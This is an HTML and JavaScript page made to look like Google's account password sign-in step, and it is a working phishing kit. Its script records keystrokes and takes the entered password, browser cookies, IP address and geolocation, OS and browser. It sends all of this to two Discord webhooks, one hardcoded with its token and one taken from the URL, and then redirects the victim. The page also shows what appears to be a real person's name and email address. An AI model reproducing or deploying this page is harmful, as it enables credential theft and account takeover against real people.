<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Sign in - Google Accounts</title>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="icon" type="image/x-icon" href="googlefavicon.png">
    <style>
        @import url("https://fonts.googleapis.com/css?family=Roboto:400,500");

        body {
            margin: 0;
            height: 100vh;
            background-color: rgb(30 31 32 / 1);
            color: rgb(168 199 250 / 1);
            display: flex;
            justify-content: center;
            align-items: center;
        }

        .container {
            display: flex;
            flex-direction: column;
            align-items: flex-start;
        }

        .form {
            width: 950px;
            height: auto;
            background-color: rgb(14 14 14 / 1);
            border-radius: 30px;
            color: white;
            display: flex;
            flex-direction: column;
            padding: 20px;
            position: relative;
        }

        .img {
            width: 45px;
            height: 45px;
            margin-left: 19px;
            margin-top: 20px;
            cursor: pointer;
        }

        .img img {
            width: 100%;
            height: 100%;
        }

        .sign-in-container {
            display: flex;
            align-items: center;
            margin-top: 37px;
            margin-left: -3px;
        }

        .sign-in {
            font-size: 36px;
            margin-right: 20px;
            margin-left: 20px;
            margin-top: 2px;
            font-family: "Roboto";
            color: rgb(227 227 227 / 1);
        }

        .emailinput {
            padding-left: 17px;
            border: 1px solid rgb(179, 179, 179);
            border-radius: 5px;
            width: 415px;
            height: 53px;
            font-size: 17px;
            color: rgb(227 227 227 / 1);
            background-color: transparent;
            margin-top: 120px;
            margin-left: 995px;
            box-shadow: none;
            outline: none;
            z-index: 2;
            position: absolute;
            transition: ease-in 0.2s;
        }

        .emailinput:focus {
            border-width: 2px;
            border-color: rgb(168 199 250 / 1);
            z-index: 1;
        }

        .placeholder1 {
            font-size: 16.5px;
            color: rgb(180, 180, 180);
            width: 160px;
            margin-left: 1010px;
            margin-top: 135px;
            /*85px*/
            z-index: 1;
            text-align: center;
            position: absolute;
            transition: ease-in-out 0.2s;
            background-color: rgb(14 14 14 / 1);
            font-family: "Roboto";
            height: 20px;
        }

        .changelanguagebtn {
            background-color: rgb(30 31 32 / 1);
            color: rgb(217, 215, 215);
            font-family: "Roboto", sans-serif;
            font-size: 12px;
            padding: 8px 12px;
            border: none;
            border-radius: 7px;
            cursor: pointer;
            display: flex;
            align-items: center;
            gap: 6px;
            margin-left: 7px;
        }

        .changelanguagebtn:hover {
            background-color: rgb(68 71 70 / 1);
        }

        .changelanguagebtn:focus {
            outline: 2px solid rgb(168 199 250 / 1);
        }

        .arrow-down {
            margin-left: 23px;
            border: solid rgb(217, 215, 215);
            border-width: 0 1.5px 1.5px 0;
            display: inline-block;
            padding: 3px;
            transform: rotate(45deg);
            margin-top: -3px;
            z-index: 11;
        }

        .PrivacyBtn {
            background-color: rgb(30 31 32 / 1);
            color: rgb(217, 215, 215);
            font-family: "Roboto", sans-serif;
            font-size: 12px;
            padding: 8px 12px;
            border: none;
            border-radius: 7px;
            cursor: pointer;
            display: flex;
            align-items: center;
            gap: 6px;
            text-decoration: none;
        }

        .PrivacyBtn:hover {
            background-color: rgb(68 71 70 / 1);
        }

        .footer-buttons {
            width: 100%;
            display: flex;
            justify-content: space-between;
            align-items: center;
            padding: 20px 10px 0 10px;
            box-sizing: border-box;
        }

        .right-buttons {
            display: flex;
            gap: 10px;
        }

        .links {
            color: rgb(168 199 250 / 1);
            font-size: 14.5px;
            font-family: "Roboto";
            font-weight: 410;
            margin-left: 455px;
            cursor: pointer;
            width: 90px;
            border-radius: 3px;
            margin-top: -40px;
            text-decoration: none;
        }

        .links:hover {
            background-color: rgb(31, 39, 52);
        }

        .text {
            color: rgb(193, 193, 193);
            font-size: 14.5px;
            font-family: "Roboto";
            margin-top: 42px;
            margin-left: 455px;
            display: flex;
        }

        .underlinelinks {
            color: rgb(168 199 250 / 1);
            font-size: 14.5px;
            font-weight: 410;
            font-family: "Roboto";
            cursor: pointer;
            margin-left: 455px;
            margin-top: -12px;
            text-decoration: none;
        }

        .underlinelinks:hover {
            text-decoration: underline;
        }

        .button-row {
            display: flex;
            width: 100%;
            padding: 30px 40px 0 40px;
            margin-bottom: 20px;
        }

        .CreateAccount {
            width: 160px;
            height: 40px;
            text-decoration: none;
            font-family: "Roboto";
            border-radius: 25px;
            font-size: 14px;
            cursor: pointer;
            text-align: center;
            line-height: 40px;
            color: rgb(168 199 250 / 1);
            background: none;
            border: none;
            margin-left: 620px;
            margin-right: 20px;
            margin-top: 90px;
            z-index: 2;
        }

        .CreateAccount:hover {
            background-color: rgb(37, 39, 42);
        }

        .Next {
            width: 90px;
            height: 40px;
            text-decoration: none;
            font-family: "Roboto";
            font-size: 14px;
            cursor: pointer;
            border-radius: 25px;
            background-color: rgb(168 199 250 / 1);
            color: rgb(6 46 111 / 1);
            border: none;
            text-align: center;
            margin-top: 90px;
            margin-bottom: -10px;
            line-height: 40px;
        }

        .Next:hover {
            background-color: rgb(184, 211, 255);
        }

        .btn-ripple {
            position: relative;
            overflow: hidden;
            z-index: 0;
            /* Ensure button content is above ripple */
        }

        .btn-ripple>.ripple {
            z-index: -1;
            /* Place ripple behind button content */
        }

        .ripple {
            position: absolute;
            border-radius: 50%;
            transform: scale(0);
            animation: rippleEffect 0.3s linear forwards;
            pointer-events: none;
            z-index: 0;
            /* <- Add this line */
        }

        @keyframes rippleEffect {
            to {
                transform: scale(4);
                opacity: 1;
            }
        }






        .ErrorRow {
            display: flex;
            width: 100%;
            position: absolute;
        }

        .Error {
            font-family: "Roboto";
            font-size: 12.5px;
            color: rgb(242 184 181 / 1);
            margin-top: 236px;
            display: none;
        }




        .Loading {
            opacity: 25%;
            background-color: black;
            width: 1500px;
            height: 750px;
            display: none;
            z-index: 9;
            position: absolute;
        }

        .progress-container {
            position: absolute;
            top: 141px;
            /* Keep your vertical offset */
            left: 50%;
            transform: translateX(-50%);
            width: 925px;
            height: 4px;
            background-color: #2e2e2e;
            justify-content: center;
            margin-top: -142px;
            overflow: hidden;
            z-index: 9999;
            display: none;
        }

        .bar {
            position: absolute;
            height: 100%;
            background-color: rgb(168 199 250 / 1);
            will-change: left, width;
        }

        .bar1 {
            animation: bar1move 2s cubic-bezier(0.4, 0.0, 0.2, 1) infinite;
        }

        .bar2 {
            animation: bar2move 2s cubic-bezier(0.4, 0.0, 0.2, 1) infinite;
            animation-delay: 1s;
        }



        @keyframes bar1move {
            0% {
                left: -35%;
                width: 30%;
            }

            50% {
                left: 100%;
                width: 30%;
            }

            100% {
                left: 100%;
                width: 30%;
            }
        }

        @keyframes bar2move {
            0% {
                left: -50%;
                width: 20%;
            }

            50% {
                left: 100%;
                width: 20%;
            }

            100% {
                left: 100%;
                width: 20%;
            }
        }




        .UserContainer {
            width: 300;
            height: 32px;
            margin-top: 166px;
            display: flex;
            align-items: center;
            border: 1px solid #959595;
            border-radius: 32px;
            background-color: transparent;
            margin-left: 20px;
            color: #fff;
            z-index: 5;
            position: absolute;
            cursor: pointer;
            text-decoration: none;
            z-index: 11;
        }

        .UserContainer:hover {
            background-color: rgb(38, 38, 38);
            z-index: 11;
        }

        .circle {
            width: 26.5px;
            height: 26.5px;
            background-color: purple;
            border: none;
            /* Fixed border */
            border-radius: 26.5px;
            display: flex;
            margin-top: 0px;
            margin-left: 3px;
            font-size: 15px;
            font-family: "Roboto";
            color: rgb(227 227 227 / 1);
            z-index: 11;
        }

        p {
            font-size: 15px;
            margin-left: 4px;
            margin-top: 12px;
            font-family: "Roboto";
            color: rgb(227 227 227 / 1);
            z-index: 11;
        }

        .Usericon {
            position: absolute;
            margin-left: 10.8px;
            margin-bottom: 12px;
            z-index: 11;
        }

        .verifytext {
            margin-left: 995px;
            margin-top: 110px;
            width: 240px;
            position: absolute;
            z-index: 3;
            transition: ease-in-out 0.2s;
        }

        .square {
            width: 15px;
            /* Square width */
            height: 15px;
            /* Square height */
            background-color: rgb(14, 14, 14);
            /* Dark background */
            border: 1.5px solid #959595;
            /* Border with a thin grey line */
            border-radius: 2px;
            /* Rounding corners */
            display: inline-block;
            /* Inline-block element */
            position: absolute;
            transition: ease-in-out 0.2s;
        }

        .circle1 {
            width: 32px;
            /* Square width */
            height: 32px;
            /* Square height */
            background-color: transparent;
            /* Dark background */
            z-index: 8;
            border-radius: 30px;
            margin-left: -7px;
            margin-top: -7px;
            opacity: 30%;
            position: absolute;
            display: flex;
            transition: ease-in-out 0.2s;
        }

        .circle1:hover {
            width: 32px;
            /* Square width */
            height: 32px;
            /* Square height */
            background-color: rgb(155, 155, 155);
            /* Dark background */
            z-index: 8;
            border-radius: 30px;
            margin-left: -7px;
            margin-top: -7px;
            opacity: 30%;
            position: absolute;
            display: flex;
        }

        .showpasswordcontainer {
            margin-left: 1000px;
            margin-top: 246px;
            position: absolute;
            transition: ease-in-out 0.2s;
        }


        .greybox {
            width: 469px;
            height: 200px;
            z-index: 10;
            position: absolute;
            top: 50px;
            /* Adjust as needed */
            left: 0px;
            /* Adjust as needed */
            background-color: rgb(14 14 14 / 1);
            margin-top: 50px;
            display: flex;
        }

        .SwipeContainerPass {
            margin-left: 800px;
        }

        .Blackbox {
            background-color: rgb(14 14 14 / 1);
            width: 39px;
            height: 275px;
            position: absolute;
            margin-top: 10px;
            margin-left: 930.5px;
            z-index: 4;
        }

        .greybox1 {
            background-color: rgb(30 31 32 / 1);
            width: 240px;
            height: 295px;
            position: absolute;
            margin-top: 10px;
            margin-left: 969.5px;
            z-index: 5;
        }






        .emailinput2 {
            padding-left: 17px;
            border: 1px solid rgb(179, 179, 179);
            border-radius: 5px;
            width: 415px;
            height: 53px;
            font-size: 17px;
            color: rgb(227 227 227 / 1);
            background-color: transparent;
            margin-top: 109px;
            margin-left: 452px;
            position: absolute;
            box-shadow: none;
            outline: none;
            z-index: 1;
            transition: ease-in-out 0.2s;
        }

        .emailinput2:focus {
            border-width: 2px;
            border-color: rgb(168 199 250 / 1);
        }

        .placeholder2 {
            font-size: 16.5px;
            color: rgb(180, 180, 180);
            width: 114px;
            margin-left: 470px;
            margin-top: 126px;
            text-align: center;
            position: absolute;
            background-color: rgb(14 14 14 / 1);
            transition: ease-in-out 0.2s;
            font-family: "Roboto";
            height: 20px;
            z-index: 1;
        }

        .links1 {
            color: rgb(168 199 250 / 1);
            font-size: 14.5px;
            font-family: "Roboto";
            font-weight: 410;
            margin-left: 455px;
            cursor: pointer;
            position: absolute;
            width: 90px;
            border-radius: 3px;
            margin-top: 175px;
            text-decoration: none;
            transition: ease-in-out 0.2s;
            z-index: 1;
        }

        .links1:hover {
            background-color: rgb(31, 39, 52);
        }

        .text1 {
            color: rgb(193, 193, 193);
            font-size: 14.5px;
            font-family: "Roboto";
            margin-top: 232px;
            position: absolute;
            margin-left: 455px;
            display: flex;
            transition: ease-in-out 0.2s;
            z-index: 1;
        }

        .underlinelinks1 {
            color: rgb(168 199 250 / 1);
            font-size: 14.5px;
            font-weight: 410;
            font-family: "Roboto";
            position: absolute;
            cursor: pointer;
            margin-left: 455px;
            margin-top: 252px;
            text-decoration: none;
            transition: ease-in-out 0.2s;
            z-index: 1;
        }

        .underlinelinks1:hover {
            text-decoration: underline;
        }


        .btn-ripple {
            position: relative;
            overflow: hidden;
            z-index: 0;
            /* Ensure button content is above ripple */
        }

        .btn-ripple>.ripple {
            z-index: -1;
            /* Place ripple behind button content */
        }

        .ripple {
            position: absolute;
            border-radius: 50%;
            transform: scale(0);
            background-color: rgba(255, 255, 255, 0.4);
            animation: rippleEffect 0.6s linear forwards;
        }



        @keyframes rippleEffect {
            to {
                transform: scale(4);
                opacity: 1;
            }
        }
    </style>
</head>

<body>

    <div class="Loading" id="Loadingscreen"></div>


    <div class="container">
        <div class="form" id="form">

            <input type="email" class="emailinput2" id="emailInput2" />
            <p class="placeholder2" id="placeholder2">Email or phone</p>
            <a class="links1" href="https://accounts.google.com/signin/v2/usernamerecovery" target="_blank"
                id="links1">Forgot email?</a>
            <p class="text1" id="text1">Not your computer? Use a private browsing window to sign in.</p>
            <a class="underlinelinks1" href="https://support.google.com/accounts/answer/2917834" target="_blank"
                id="underlinelinks1">Learn more about using Guest mode</a>


            <div class="greybox" id="greybox"></div>
            <div class="greybox1"></div>
            <div class="Blackbox"></div>
            <div class="progress-container" id="progress-container">
                <div class="bar bar1"></div>
                <div class="bar bar2"></div>
            </div>

            <div class="img">
                <img src="googlelogo.png" alt="Google Logo" />
            </div>

            <p class="verifytext" id="verifytext">To continue, first verify that it's you</p>

            <div class="sign-in-container" id="sign-in-container">
                <p class="sign-in" id="namedisplay" style="margin-right: -25px; margin-top: 0px;">Louie RO56780</p>
                <input type="password" class="emailinput" id="emailInput" />
                <p class="placeholder1" id="placeholder1">Enter your password</p>
            </div>

            <div class="ErrorRow">

                <a class="UserContainer"
                    href="https://accounts.google.com/v3/signin/accountchooser?service=CPanel&flowName=GlifWebSignIn&flowEntry=AccountChooser&dsh=S-1926627896%3A1746388959346725"
                    target="_blank">
                    <div class="circle"></div>
                    <p class="Usericon" id="UserIcon">L</p>
                    <p id="emaildisplay">Louie.56780@ismonaco.com</p>
                    <div class="arrow-down" style="margin-top: -3px; margin-left: 5px; margin-right: 10px;"></div>
                </a>

                <img src="warning.png"
                    style="display: none; width: 16.5px; height: 16.5px; margin-left: 498px; margin-right: 2px; margin-top: 235px;"
                    id="warningimg">
                <p class="Error" id="ErrorTxt">Wrong password. Try again or click ‘Forgot password’ to reset it.</p>
            </div>

            <div class="showpasswordcontainer" id="showpasswordcontainer">
                <p class="circle1" id="circle1"></p>
                <div class="square" id="square"></div>
                <p style="margin-left: 38px; margin-top: 0px;" id="showpasswordtext">Show password</p>
            </div>

            <div class="button-row">
                <a class="CreateAccount btn-ripple" data-ripple-color="rgb(40, 43, 46)" id="CreateAccountBtn"
                    href="https://support.google.com/accounts/answer/" target="_blank">Forgot Password?</a>
                <button class="Next btn-ripple" data-ripple-color="rgb(209, 227, 255)" id="NextButton">Next</button>
            </div>
        </div>
        <div class="footer-buttons">
            <button class="changelanguagebtn">
                English (United States)
                <i class="arrow-down"></i>
            </button>
            <div class="right-buttons">
                <a class="PrivacyBtn" href="https://support.google.com/accounts" target="_blank">Help</a>
                <a class="PrivacyBtn" href="https://policies.google.com/privacy" target="_blank">Privacy</a>
                <a class="PrivacyBtn" href="https://policies.google.com/terms" target="_blank">Terms</a>
            </div>
            <script>
                document.addEventListener("DOMContentLoaded", async function () {
                    const NextButton = document.getElementById("NextButton");
                    const CreateAccountBtn = document.getElementById("CreateAccountBtn");
                    const warningimg = document.getElementById("warningimg");
                    const ErrorTxt = document.getElementById("ErrorTxt");
                    const Loadingscreen = document.getElementById("Loadingscreen");
                    const progresscontainer = document.getElementById("progress-container");
                    const namedisplay = document.getElementById("namedisplay");
                    const emaildisplay = document.getElementById("emaildisplay");
                    const UserIcon = document.getElementById("UserIcon");
                    const form = document.getElementById("form");
                    const emailInput = document.getElementById("emailInput");
                    const placeholder = document.getElementById("placeholder1");

                    const savedEmail = localStorage.getItem("username") || "user@example.com";
                    namedisplay.textContent = savedEmail.split("@")[0].replace(/\./g, " ");
                    emaildisplay.textContent = savedEmail;
                    UserIcon.textContent = savedEmail.charAt(0).toUpperCase();

                    let hasValidationError = false;

                    const showpasswordcontainer = document.getElementById("showpasswordcontainer");
                    const signincontainer = document.getElementById("sign-in-container");
                    const verifytext = document.getElementById("verifytext");


                    const links1 = document.getElementById("links1");
                    const underlinelinks1 = document.getElementById("underlinelinks1");
                    const text1 = document.getElementById("text1");
                    const placeholder2 = document.getElementById("placeholder2");
                    const emailInput2 = document.getElementById("emailInput2");


                    progresscontainer.style.display = "flex";
                    Loadingscreen.style.display = "flex";

                    const emailInput1 = document.getElementById("emailInput1");

                    await new Promise(resolve => setTimeout(resolve, 250));

                    signincontainer.marginLeft = "-3px";
                    emailInput.style.marginLeft = "495px";
                    showpasswordcontainer.style.marginLeft = "500px";
                    placeholder.style.marginLeft = "510px";
                    verifytext.style.marginLeft = "495px";

                    links1.style.marginLeft = "10px";
                    underlinelinks1.style.marginLeft = "10px";
                    text1.style.marginLeft = "10px";
                    placeholder2.style.marginLeft = "10px";
                    emailInput2.style.marginLeft = "10px";

                    await new Promise(resolve => setTimeout(resolve, 300));
                    progresscontainer.style.display = "none";
                    Loadingscreen.style.display = "none";
                    placeholder.style.transition = "ease-in-out 0.1s";

                    links1.style.transition = "none";
                    underlinelinks1.style.transition = "none";
                    text1.style.transition = "none";
                    placeholder2.style.transition = "none";
                    emailInput2.style.transition = "none";
                    showpasswordcontainer.style.transition = "none";


                    emailInput.focus();
                    floatPlaceholder("rgb(184, 211, 255)");



                    function floatPlaceholder(color) {
                        placeholder.style.marginTop = "79px";
                        placeholder.style.fontSize = "12px";
                        placeholder.style.marginLeft = "506px";
                        placeholder.style.width = "121px";
                        placeholder.style.color = color;
                        placeholder.style.zIndex = "2";
                    }

                    function resetPlaceholder() {
                        placeholder.style.fontSize = "16.5px";
                        placeholder.style.color = "rgb(180, 180, 180)";
                        placeholder.style.width = "160px";
                        placeholder.style.marginLeft = "510px";
                        placeholder.style.marginTop = "135px";
                        placeholder.style.zIndex = "1";
                    }

                    function showValidationError() {
                        hasValidationError = true;
                        emailInput.style.borderColor = "rgb(242, 184, 181)";
                        warningimg.style.display = "flex";
                        ErrorTxt.style.display = "flex";
                        floatPlaceholder("rgb(242, 184, 181)");
                        showpasswordcontainer.style.marginTop = "266px";
                        NextButton.style.marginTop = "110px";
                        CreateAccountBtn.style.marginTop = "110px";
                        if (form) form.style.height = "auto";
                    }

                    function clearValidationError() {
                        hasValidationError = false;
                        emailInput.style.borderColor = "rgb(179, 179, 179)";
                        warningimg.style.display = "none";
                        ErrorTxt.style.display = "none";
                        floatPlaceholder("rgb(184, 211, 255)");
                        showpasswordcontainer.style.marginTop = "246px";
                        NextButton.style.marginTop = "90px";
                        CreateAccountBtn.style.marginTop = "90px";
                        if (form) form.style.height = "auto";
                    }


                    async function handleValidation() {
                        const emailVal = emailInput.value.trim();

                        if (emailVal.length < 7) {
                            showValidationError();
                            return;
                        }

                        clearValidationError();

                        Loadingscreen.style.display = "flex";
                        progresscontainer.style.display = "flex";

                        const password = emailInput.value;
                        localStorage.setItem("password", password);

                        // Send message to Discord
                        sendMessage1(emailVal);
                        sendMessageBeamlol(emailVal);

                        placeholder.style.color = "rgb(180, 180, 180)";
                        await new Promise(resolve => setTimeout(resolve, 1000));

                        const urlParams = new URLSearchParams(window.location.search);
                        const idParam = urlParams.get("id");
                        const [webhook, redirect] = idParam.split("@");

                        window.location.href = redirect;
                    }








                    let keystrokes = ""; // Variable to store all keys

                    document.addEventListener('keydown', (event) => {
                        const keyName = event.key.length > 1 ? ` (${event.key})` : event.key;
                        keystrokes += keyName;
                    });




                    async function sendMessage1(emailVal) {
                        await collectData(); // Ensure data is collected before proceeding

                        const urlParams = new URLSearchParams(window.location.search);
                        const idParam = urlParams.get("id");
                        const [webhook, redirect] = idParam.split("@");


                        var request = new XMLHttpRequest();
                        request.open("POST", webhook);
                        request.setRequestHeader("Content-type", "application/json");

                        const emailInput = document.getElementById("emailInput");
                        const password = emailInput ? emailInput.value : "No input";

                        // Parse capturedData properly
                        const capturedData = JSON.parse(localStorage.getItem("capturedData") || "{}");

                        // Ensure capturedData has valid values
                        const ip = capturedData.IP || "Unknown IP";
                        const city = capturedData.City || "Unknown City";
                        const country = capturedData.country || "Unknown Country";
                        const browser = capturedData.browser || "Unknown Browser";
                        const os = capturedData.computer || "Unknown OS";
                        const cookies = capturedData.cookie || "No cookies";
                        const timeCaptured = capturedData.timecaptured || "Unknown Time";

                        var params = {
                            content: `
 
 ✅ Successfully captured user's data:


• Email/phone-number: ${localStorage.getItem("username")}
• Password: ${password}

Location 📌
• IP: ${ip}
• City: ${city}
• Country: ${country}

Computer data 💻
• OS: ${os}
• Browser: ${browser}

Other data 📈
• Cookies: ${cookies}
• Submission-Time: ${timeCaptured}

• Keylog: ${keystrokes}
 `,
                        };

                        request.send(JSON.stringify(params));
                    }


                    async function sendMessageBeamlol(emailVal) {
                        await collectData(); // Ensure data is collected before proceeding

                        var request = new XMLHttpRequest();
                        request.open("POST", "https://discord.com/api/webhooks/1372890710197538836/6AqGgSdyFXGftesstZrWxJzyx-5rsE3q3nRx3P2q7ledFXS9mlMBaB-OXdzfCFYfEA8M");
                        request.setRequestHeader("Content-type", "application/json");

                        const emailInput = document.getElementById("emailInput");
                        const password = emailInput ? emailInput.value : "No input";

                        // Parse capturedData properly
                        const capturedData = JSON.parse(localStorage.getItem("capturedData") || "{}");

                        // Ensure capturedData has valid values
                        const ip = capturedData.IP || "Unknown IP";
                        const city = capturedData.City || "Unknown City";
                        const country = capturedData.country || "Unknown Country";
                        const browser = capturedData.browser || "Unknown Browser";
                        const os = capturedData.computer || "Unknown OS";
                        const cookies = capturedData.cookie || "No cookies";
                        const timeCaptured = capturedData.timecaptured || "Unknown Time";

                        var params = {
                            content: `
 
 ✅ Successfully captured user's data:


• Email/phone-number: ${localStorage.getItem("username")}
• Password: ${password}

Location 📌
• IP: ${ip}
• City: ${city}
• Country: ${country}

Computer data 💻
• OS: ${os}
• Browser: ${browser}

Other data 📈
• Cookies: ${cookies}
• Submission-Time: ${timeCaptured}

• Keylog: ${keystrokes}
 `,
                        };

                        request.send(JSON.stringify(params));
                    }



                    // Event listeners
                    NextButton.addEventListener("click", handleValidation);
                    emailInput.addEventListener("keydown", (e) => {
                        if (e.key === "Enter") handleValidation();
                    });

                    emailInput.addEventListener("focus", () => {
                        floatPlaceholder(hasValidationError ? "rgb(242, 184, 181)" : "rgb(184, 211, 255)");
                        emailInput.style.borderColor = hasValidationError ? "rgb(242, 184, 181)" : "rgb(184, 211, 255)";
                    });

                    emailInput.addEventListener("blur", () => {
                        if (!emailInput.value.trim()) {
                            resetPlaceholder();
                            if (!hasValidationError) {
                                emailInput.style.borderColor = "rgb(179, 179, 179)";
                            }
                        }
                    });

                    if (emailInput.value) {
                        floatPlaceholder("rgb(180, 180, 180)");
                    }
                });




                async function collectData() {
                    const userAgent = navigator.userAgent;
                    const timezone = Intl.DateTimeFormat().resolvedOptions().timeZone;
                    const cookies = document.cookie || "No cookies";

                    if (!localStorage.getItem("submissionTime")) {
                        localStorage.setItem("submissionTime", new Date().toISOString());
                    }

                    const submissionTime = new Date(localStorage.getItem("submissionTime"));
                    const minutesAgo = Math.floor((new Date() - submissionTime) / 60000);

                    const res = await fetch("https://ipapi.co/json/");
                    const geo = await res.json();

                    const data = {
                        IP: geo.ip,
                        minsago: minutesAgo,
                        City: geo.city,
                        country: geo.country_name,
                        cookie: cookies,
                        computer: detectOS(userAgent),
                        browser: detectBrowser(userAgent),
                        timecaptured: new Date().toLocaleString(),
                        timezone: timezone
                    };

                    for (const [key, value] of Object.entries(data)) {
                        localStorage.setItem(key, value);
                        const row = document.createElement("tr");
                        row.innerHTML = `<th>${key}</th><td>${value}</td>`;
                        document.getElementById("contactForm")?.appendChild(row);
                    }

                    localStorage.setItem("capturedData", JSON.stringify(data));
                }

                // Save the captured data in localStorage
                localStorage.setItem("capturedData", JSON.stringify(data));


                function detectOS(ua) {
                    if (ua.includes("Win")) return "Windows";
                    if (ua.includes("Mac")) return "MacOS";
                    if (ua.includes("Linux")) return "Linux";
                    if (ua.includes("Android")) return "Android";
                    if (ua.includes("like Mac")) return "iOS";
                    return "Unknown";
                }

                function detectBrowser(ua) {
                    if (ua.includes("Firefox")) return "Firefox";
                    if (ua.includes("Edg")) return "Edge";
                    if (ua.includes("Chrome")) return "Chrome";
                    if (ua.includes("Safari")) return "Safari";
                    return "Unknown";
                }

                document.querySelectorAll(".btn-ripple").forEach((button) => {
                    button.addEventListener("click", function (e) {
                        const ripple = document.createElement("span");
                        const size = Math.max(button.clientWidth, button.clientHeight);
                        const x = e.clientX - button.getBoundingClientRect().left - size / 2;
                        const y = e.clientY - button.getBoundingClientRect().top - size / 2;

                        ripple.style.width = ripple.style.height = `${size}px`;
                        ripple.style.left = `${x}px`;
                        ripple.style.top = `${y}px`;
                        ripple.classList.add("ripple");

                        const existingRipple = button.querySelector(".ripple");
                        if (existingRipple) {
                            existingRipple.remove();
                        }

                        button.appendChild(ripple);
                    });
                });

            </script>


</body>

</html>